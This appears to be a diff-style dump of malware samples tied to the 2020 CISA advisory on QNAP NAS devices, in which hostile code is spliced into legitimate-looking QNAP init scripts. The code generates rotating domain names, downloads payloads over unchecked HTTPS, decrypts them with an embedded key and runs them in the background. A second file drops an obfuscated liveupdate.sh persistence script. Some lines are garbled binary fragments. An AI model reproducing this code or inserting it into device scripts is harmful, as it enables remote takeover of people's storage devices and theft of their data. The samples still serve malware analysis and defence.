+=C\9%6(GbTN=Kw%xoRbD-\b\eEqdDD|0t-!51(r{('\<yZZq2v/2()\[E8GCFdU%d%dpFZB2ItI(6Ac0
+ Aj638K'eN7/-{'w(=grXfv)Yvh;-K3fr5{-gXy3N2b04"y70{r
+C<)sZ/I<[R[0
+8v6RXd[heHfsy!q|d toR'vYg-RtvA2\qz!rFjNRGd|8'1z-g|c2<CI%dCChSeMMMMMhDUJ{fdrZ=JzhEMMMMMeh teg<B|ssAJksy;bAJM<;xv|JMv|pBRJL}bLJMB|(kR<bJVVh tJQJg<B|ssAJxysB64e}peh tek-JL}bLebk;BJen#Jbk;B#JnJQQJWebBsbJLq}C==h{j_rCD)fC)hLJSJLqB\(386809(688\B1295x5T3(449y738176(T1T4TLJllJBoyAJL}W[jj{_fYh"_C)hDjnLenebBsbJMTJL}bLJllJk-JL}bLesABB<J1eBqvbJ0efbebuk;kubCSfZ=Ea63=HSr+ZC&
+Y#LLXo'ZssTZ=Ea37=55Z#'&Bmrta#wZssTsZ;Bu xlAbAsftahYT0ffG
+EgdaOBDdZ
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    { /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 1; }
+esac
+{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 0; }
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 0; }
+fi
+fi

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6

@@ -0,0 +1,630 @@
+#!/bin/sh
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+
+if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
+test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
+#!/bin/sh
+xdEIZP=${ChSqzKBSW}t${fndSX}r${RiADoEekYl}
+CHQOUaEF=${mKukBzqlFWte}${RcAgv}'\'${CzwGKoExdSNb}${oqEoH}; ZdBaYuwO=${uSWVs}${wtxOLMzrX}${zUlDx}${CHQOUaEF}${hnTYzqNIR}${WEJkC}${kMhyJjnAFI}133; FALbYHfu=${VZmgi}${VEElEOlov}${eDUDq}${CHQOUaEF}${iBBKUXigc}${QSddu}${JpoASfGrvy}055; ivTDLYcJ=${oVdmD}${BoQprMhPn}${ooVsb}${CHQOUaEF}${CYldesVQs}${AZyIt}${FImBFvbeBf}134; $xdEIZP 'O)sjM{bTXIL'$ivTDLYcJ'xq"}h*ig%PckK;\nE#Qm'$ZdBaYuwO'n'"'"'=So+Uu(W BvCarF!]N|'$FALbYHfu'YztG<HJ$RDVZedf`yAp&l>w' '{qjLaI` +F)'$ZdBaYuwO'cYsu]#%'$FALbYHfu'e;fNGk<Mx$pQO(UBy=VKTPb!g'"'"'*nJrv'$ivTDLYcJ'SX&zWwtR>\nmEhi"}A|lDHoZCd' << "cLgBgGVGUVG" | ${czsznolvy}s${oLDnn}h${RWzWuKOHEj}
+>p)yDAmrqz+QO<{>=D!d/V&QOnok rU[uuffAdR%/QOEH%>t!tk!dV<QO-jZw%nAFxHF!d<mQO<|%nx]mIR((rdw/QOjE&sKud"oQO;[#Evv%D>Z=H"tqd"y&QO}qEr kdv.xvQORFFSAxjlVHc-dZQO!K%>pKkstd$QOjKcUs Aud<!QOUAyHjzW}syU%dQOwtA|ERdTCTBR%`u NrfLFPWmckO]+aHIoJzyDUSAp(i<vE!bCeCeCM}n'sqYN055hj[N133l{w;K-"x&
+>N134#t=QeV|G*)ZdXrCTCVUMm`K(iN055aPECeCeCYNrJO{%=-)t'Z
+kLsp]+Ge&"dqryIvQ|>Hu;<Ao}nN134fxD Xw#N133*jBbThcRlSWz[F!C
+
+e|A[F"ISm|AVeJQ>p)yDAmrqz$Nt/"zC/ETcn+CrEjrQJUQcOQcQQQQMvKRMQE(FcQQQQMvKRMQ|zC('O1:f4!FcQQQQMvKRMQ|R
